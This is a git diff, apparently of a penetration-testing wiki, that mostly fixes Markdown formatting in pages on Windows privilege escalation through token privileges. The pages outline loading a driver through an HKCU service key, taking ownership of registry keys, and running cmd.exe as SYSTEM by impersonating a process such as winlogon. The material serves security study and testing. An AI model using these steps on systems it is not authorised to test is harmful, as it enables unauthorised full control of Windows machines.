 This token **can be used** as EoP method **only** if the user **can impersonate** tokens (even without SeImpersonatePrivilege).\
- In a possible scenario, a user can impersonate the token if it is for the same user and the integrity level is less or equal to the current process integrity level.\
- In this case, the user could **create an impersonation token** and add to it a privileged group SID.
+&#x20;In a possible scenario, a user can impersonate the token if it is for the same user and the integrity level is less or equal to the current process integrity level.\
+&#x20;In this case, the user could **create an impersonation token** and add to it a privileged group SID.
 
 ### SeLoadDriverPrivilege (3.1.7)
 
 **Load and unload device drivers.**\
 ****You need to create an entry in the registry with values for ImagePath and Type.\
 As you don't have access to write to HKLM, you have to **use HKCU**. But HKCU doesn't mean anything for the kernel, the way to guide the kernel here and use the expected path for a driver config is to use the path: "\Registry\User\S-1-5-21-582075628-3447520101-2530640108-1003\System\CurrentControlSet\Services\DriverName" (the ID is the **RID** of the current user).\
- So, you have to **create all that path inside HKCU and set the ImagePath** (path to the binary that is going to be executed) **and Type** (SERVICE_KERNEL_DRIVER 0x00000001).\
+&#x20;So, you have to **create all that path inside HKCU and set the ImagePath** (path to the binary that is going to be executed) **and Type** (SERVICE\_KERNEL\_DRIVER 0x00000001).\
 [**Learn how to exploit it here.**](../active-directory-methodology/privileged-accounts-and-token-privileges.md#seloaddriverprivilege)****
 
 ### SeTakeOwnershipPrivilege (3.1.8)
 
 This privilege is very similar to **SeRestorePrivilege**.\
-It allows a process to “**take ownership of an object** without being granted discretionary access” by granting the WRITE_OWNER access right.\
+It allows a process to “**take ownership of an object** without being granted discretionary access” by granting the WRITE\_OWNER access right.\
 First, you have to **take ownership of the registry key** that you are going to write on and **modify the DACL** so you can write on it.
 
 ### SeDebugPrivilege (3.1.9)
@@ -67,7 +67,7 @@ There are a lot of various **memory injection** strategies that can be used with
 whoami /priv
 ```
 
-The **tokens that appear as **_**Disabled**_** can be enable**, you you actually can abuse _Enabled_ and _Disabled _tokens.
+The **tokens that appear as **_**Disabled**_** can be enable**, you you actually can abuse _Enabled_ and _Disabled_ tokens.
 
 ## Table
 
@@ -88,4 +88,4 @@ Full token privileges cheatsheet at [https://github.com/gtworek/Priv2Admin](http
 ## Reference
 
 * Take a look to this table defining Windows tokens: [https://github.com/gtworek/Priv2Admin](https://github.com/gtworek/Priv2Admin)
-* Take a look to [**this paper**](https://github.com/hatRiot/token-priv/blob/master/abusing_token_eop\_1.0.txt)** **about privesc with tokens**.**
+* Take a look to [**this paper**](https://github.com/hatRiot/token-priv/blob/master/abusing\_token\_eop\_1.0.txt) **** about privesc with tokens**.**
diff --git a/windows/windows-local-privilege-escalation/seimpersonate-from-high-to-system.md b/windows/windows-local-privilege-escalation/seimpersonate-from-high-to-system.md
index 577a2f9d..6f736650 100644
--- a/windows/windows-local-privilege-escalation/seimpersonate-from-high-to-system.md
+++ b/windows/windows-local-privilege-escalation/seimpersonate-from-high-to-system.md
@@ -3,7 +3,7 @@
 ### Code
 
 The following code was copied from [here](https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962). It allows to **indicate a Process ID as argument** and a CMD **running as the user** of the indicated process will be run.\
-Running in a High Integrity process you can** indicate the PID of a process running as System **(like winlogon, wininit) and execute a cmd.exe as system.
+Running in a High Integrity process you can **indicate the PID of a process running as System** (like winlogon, wininit) and execute a cmd.exe as system.
 
 ```cpp
 impersonateuser.exe 1234